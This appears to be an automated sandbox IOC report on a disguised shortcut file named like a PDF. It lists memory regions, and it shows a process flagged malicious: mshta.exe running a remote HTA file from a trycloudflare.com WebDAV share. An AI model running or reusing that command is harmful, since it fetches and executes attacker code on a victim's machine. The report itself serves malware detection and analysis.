IOC Report
RE_007394029384393483.pdf.lnk.download.lnk

loading gifProcessesMemdumps1020102Label

Processes

Path
Cmdline
Malicious
C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "\\optical-bright-fonts-zealand.trycloudflare.com@SSL\DavWWWRoot\raye.hta"
 malicious

Memdumps

Base Address
Regiontype
Protect
Malicious
Download
87D2AFD000
stack
page read and write
1EE7BFF6000
heap
page read and write
1EE7C21D000
heap
page read and write
1EE7BF50000
heap
page read and write
87D2BFE000
stack
page read and write
1F67DE20000
trusted library allocation
page read and write
1F67DE28000
trusted library allocation
page read and write
1F67DE48000
trusted library allocation
page read and write
1F67DDC4000
trusted library allocation
page read and write
1EE7C0D4000
heap
page read and write
87D2368000
stack
page read and write
1F67DDE0000
trusted library allocation
page read and write
1F67DE38000
trusted library allocation
page read and write
1EE7C1D0000
heap
page read and write
1EE7C0D0000
heap
page read and write
1F67DE50000
trusted library allocation
page read and write
1F67DE08000
trusted library allocation
page read and write
1EE7BFB0000
trusted library allocation
page read and write
1EE7C1DD000
heap
page read and write
1EE7C02B000
heap
page read and write
1EE7BFD9000
heap
page read and write
1F67DDD0000
trusted library allocation
page read and write
1EE7C210000
heap
page read and write
1EE7C1D4000
heap
page read and write
87D28FE000
stack
page read and write
1F67DDC0000
trusted library allocation
page read and write
1F67DDE4000
trusted library allocation
page read and write
1F67DDF9000
trusted library allocation
page read and write
1F67DDF0000
trusted library allocation
page read and write
1F67DE00000
trusted library allocation
page read and write
1F67DDB8000
trusted library allocation
page read and write
1F67DDCC000
trusted library allocation
page read and write
1F67DDD4000
trusted library allocation
page read and write
87D2CFE000
stack
page read and write
1EE7BFD0000
heap
page read and write
1F67DE44000
trusted library allocation
page read and write
1F67DE58000
trusted library allocation
page read and write
1EE7C0EE000
heap
page read and write
1F67DDD8000
trusted library allocation
page read and write
1F67E900000
heap
page read and write
1EE7BE50000
heap
page read and write
1F67E914000
heap
page read and write
1F67DFA4000
heap
page read and write
1F67DDEC000
trusted library allocation
page read and write
1F67DDBC000
trusted library allocation
page read and write
1F67DE10000
trusted library allocation
page read and write
1EE7C044000
heap
page read and write
1F67DDB0000
trusted library allocation
page read and write
1F67DDE8000
trusted library allocation
page read and write
1F67DDF4000
trusted library allocation
page read and write
1F67E100000
trusted library allocation
page read and write
1F67DFA0000
heap
page read and write
1F67DE18000
trusted library allocation
page read and write
1F67DDAC000
trusted library allocation
page read and write
1F67DDA8000
trusted library allocation
page read and write
1F67DE2C000
trusted library allocation
page read and write
1EE7C0E9000
heap
page read and write
87D29FF000
stack
page read and write
1F67DD90000
heap
page read and write
87D23BE000
stack
page read and write
1EE7C215000
heap
page read and write
1EE7BF30000
heap
page read and write
1F67DD00000
heap
page read and write
There are 53 hidden memdumps, click here to show them.